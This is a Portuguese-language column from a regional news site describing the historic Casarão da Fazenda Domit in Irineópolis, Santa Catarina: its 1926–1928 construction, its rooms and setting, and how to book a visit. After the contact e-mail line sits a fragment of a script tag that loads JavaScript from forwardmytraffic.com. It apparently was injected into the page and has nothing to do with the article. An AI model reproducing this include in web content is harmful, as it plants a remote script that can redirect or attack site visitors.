InícioColunasCasarão da Fazenda Domit

Casarão da Fazenda Domit

Últimas notícias

Guerra Mundial: entenda riscos de conflito entre Israel e Irã

O risco de uma nova guerra mundial existe caso...

Parada 120 – Hamburgueria artesanal em Três Barras

Conheça o melhor delivery de hambúrgueres artesanais de Três...

Senado aprova isenção de IR para quem ganha até dois salários mínimos

O Senado aprovou nesta quarta-feira (17) o projeto de...

Localizado no município de Irineópolis-SC, foi construído há 90 anos, pelo industrial Cel. Joaquim Domit, libanês naturalizado brasileiro que iniciou as obras em 1926 e concluiu em agosto de 1928.

 

A madeira toda em nobre e pinho, utilizada no casarão, foi produzida e beneficiada na própria fazenda, que na época dispunha de serraria. Sua área total construída é de aproximadamente 475 m2, em dois pavimentos, que possui 18 cômodos, sendo que no pavimento térreo estão localizados: escritório, sala de visitas (capela), sala de jogos com bilhar, quatro quartos, sala de jantar, copa e cozinha, despensa, quarto de banho, sanitários, roupeiro e duas varandas, frente e fundos.

 

Foto: Soeli Regina Lima

Patrimônio de visitação

 

Subindo as escadas encontramos amplos cômodos usados pelos funcionários da casa. A varanda é convidativa para apreciar a paisagem. O cenário é bucólico, nostálgico, próprio para momentos de tranquilidade e paz.

 

Foto: Soeli Regina Lima

 

O Casarão Domit além de ser patrimônio histórico cultural possui uma riqueza ambiental no que se refere à sua preservação. Houve por parte da família a preocupação de manter na paisagem local algumas plantas e árvores da época.

 

Foto: Soeli Regina Lima

 

Se você deseja conhecer o cotidiano dos grandes proprietários da região no início do século XX fica a dica. Uma viagem no tempo.

 

Localização: Rodovia SC 460 – Km 04 –Irineópolis-SC

TEL.: (47) 3625-1232

Horário de atendimento: Visitas por agendamento através do telefone (42) 9975-1409 ou (42) 88501661

E-mail: [email protected]… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.